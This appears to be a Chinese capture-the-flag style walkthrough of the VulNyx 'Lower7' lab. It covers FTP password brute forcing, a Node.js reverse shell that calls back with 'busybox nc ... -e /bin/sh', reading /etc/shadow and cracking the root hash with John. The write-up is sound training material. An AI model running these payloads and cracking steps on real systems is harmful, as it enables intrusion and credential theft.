Vlx_Lower7

靶机来源： https://vulnyx.com/

难度：Low

一、信息收集

1、主机探测

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sn 192.168.2.0/24              
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-23 14:48 +0800
Nmap scan report for 192.168.2.1
Host is up (0.0012s latency).
MAC Address: 0A:00:27:00:00:07 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.0011s latency).
MAC Address: 08:00:27:B0:CD:45 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.94
Host is up (0.00083s latency).
MAC Address: 08:00:27:B2:ED:87 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 9.54 seconds

靶机IP：192.168.2.94

2、端口扫描

1.全端口扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -p- 192.168.2.94                   
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-23 14:49 +0800
Nmap scan report for 192.168.2.94
Host is up (0.0012s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp
3000/tcp open  ppp
MAC Address: 08:00:27:D2:B0:98 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 36.70 seconds

开放端口：21、3000

2.详细信息扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -sT -sC -sV -O -p21,3000 192.168.2.94 
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-23 14:50 +0800
Nmap scan report for 192.168.2.94
Host is up (0.00086s latency).

PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 2.0.8 or later
3000/tcp open  http    Node.js (Express middleware)
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
MAC Address: 08:00:27:D2:B0:98 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.72 seconds

3.udp扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sU --top-ports 100 192.168.2.94
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-23 14:48 +0800
Nmap scan report for 192.168.2.94
Host is up (0.00085s latency).
Not shown: 99 closed udp ports (port-unreach)
PORT   STATE         SERVICE
68/udp open|filtered dhcpc
MAC Address: 08:00:27:D2:B0:98 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 111.81 seconds

二、TCP21_Ftp

连接21端口，尝试使用anonymous进行连接，失败

┌──(root㉿kali)-[~]
└─# ftp 192.168.2.94
Connected to 192.168.2.94.
220 "Hello a.clark, Welcome to your FTP server."
Name (192.168.2.94:root): 

暴露出用户名a.clark

使用hydra进行爆破

┌──(root㉿kali)-[~/miaosec]
└─# hydra -t 4 -l a.clark -P /usr/share/wordlists/rockyou.txt ftp://192.168.2.94 -F -I
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-03-19 16:34:13
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking ftp://192.168.2.94:21/
[STATUS] 72.00 tries/min, 72 tries in 00:01h, 14344327 to do in 3320:27h, 4 active
[21][ftp] host: 192.168.2.94   login: a.clark   password: dragon
[STATUS] attack finished for 192.168.2.94 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-03-19 16:35:29

密码为：dragon

成功进入

┌──(root㉿kali)-[~/miaosec]
└─# ftp 192.168.2.94           
Connected to 192.168.2.94.
220 "Hello a.clark, Welcome to your FTP server."
Name (192.168.2.94:root): a.clark
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||39837|)
150 Here comes the directory listing.
226 Directory send OK.

三、获取a.clark权限

由于3000端口开放的是node.js服务，因此上传node.js的shell

const { exec } = require('child_process');

module.exports = (req, res) => {
  exec('busybox nc 192.168.2.4 4444 -e /bin/sh', (error, stdout) => {
    res.send(`${stdout.trim()}`);
  });
};

上传到服务器

ftp> put rev.js
local: rev.js remote: rev.js
229 Entering Extended Passive Mode (|||40243|)
150 Ok to send data.
100% |***************************************************************************************************************************************|   190        0.97 MiB/s    00:00 ETA
226 Transfer complete.
190 bytes sent in 00:00 (127.34 KiB/s)

访问rev.js

curl http://192.168.2.94:3000/rev.js

成功获取到shell

┌──(root㉿kali)-[~]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.2.4] from (UNKNOWN) [192.168.2.94] 44180
id
uid=1000(a.clark) gid=1000(a.clark) grupos=1000(a.clark),42(shadow)
whoami
a.clark

稳定shell

/usr/bin/script -qc /bin/bash /dev/null
# 按下 Ctrl+Z 将其挂起
stty raw -echo; fg
# 按下回车
reset xterm
export TERM=xterm
export SHELL=/bin/bash
stty rows 24 columns 80

四、权限提升

发现用户a.clark属于shadow组

a.clark@lower7:~$ id
uid=1000(a.clark) gid=1000(a.clark) grupos=1000(a.clark),42(shadow)

那么就可以读取shadow，查看/etc/shadow

a.clark@lower7:~$ cat /etc/shadow
root:$y$j9T$9VFLJjKZix0Ugj9YsoOCS.$z0FVk.1CCNx/YRzEmwjcz6z4oYqa7YD6QyXd52jxyLD:20374:0:99999:7:::
daemon:*:19676:0:99999:7:::
bin:*:19676:0:99999:7:::
sys:*:19676:0:99999:7:::
sync:*:19676:0:99999:7:::
games:*:19676:0:99999:7:::
man:*:19676:0:99999:7:::
lp:*:19676:0:99999:7:::
mail:*:19676:0:99999:7:::
news:*:19676:0:99999:7:::
uucp:*:19676:0:99999:7:::
proxy:*:19676:0:99999:7:::
www-data:*:19676:0:99999:7:::
backup:*:19676:0:99999:7:::
list:*:19676:0:99999:7:::
irc:*:19676:0:99999:7:::
_apt:*:19676:0:99999:7:::
nobody:*:19676:0:99999:7:::
systemd-network:!*:19676::::::
messagebus:!:19676::::::
sshd:!:19676::::::
a.clark:$y$j9T$bdXHrEdVSpm8nJ883AVV//$xAqdqEdokPrYPBIgIv68qKaU08mhJoWKrnI9WdyUpZB:20374:0:99999:7:::
ftp:!:20374::::::

获取到root用户的哈希密码$y$j9T$9VFLJjKZix0Ugj9YsoOCS.$z0FVk.1CCNx/YRzEmwjcz6z4oYqa7YD6QyXd52jxyLD

使用john进行破解

┌──(root㉿kali)-[/tmp]
└─# echo "root:$y$j9T$9VFLJjKZix0Ugj9YsoOCS.$z0FVk.1CCNx/YRzEmwjcz6z4oYqa7YD6QyXd52jxyLD:20374:0:99999:7:::" > hash

┌──(root㉿kali)-[/tmp]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt --format=crypt hash
Using default input encoding: UTF-8
Loaded 1 password hash (crypt, generic crypt(3) [?/64])
Cost 1 (algorithm [1:descrypt 2:md5crypt 3:sunmd5 4:bcrypt 5:sha256crypt 6:sha512crypt]) is 0 for all loaded hashes
Cost 2 (algorithm specific iterations) is 1 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
bassman          (root)     
1g 0:00:01:12 DONE (2026-03-19 16:59) 0.01373g/s 230.7p/s 230.7c/s 230.7C/s ice-cream..yenifer
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

找到root用户的密码：bassman

切换到root用户

a.clark@lower7:~$ su root
Contraseña: 
root@lower7:/home/a.clark# id
uid=0(root) gid=0(root) grupos=0(root)

五、查看FLAG

root@lower7:/# cat /root/root.txt /home/a.clark/user.txt 
97b79229372dea359415afef3e350241
9f903b45d270a2d0b95c68b4f3aac03f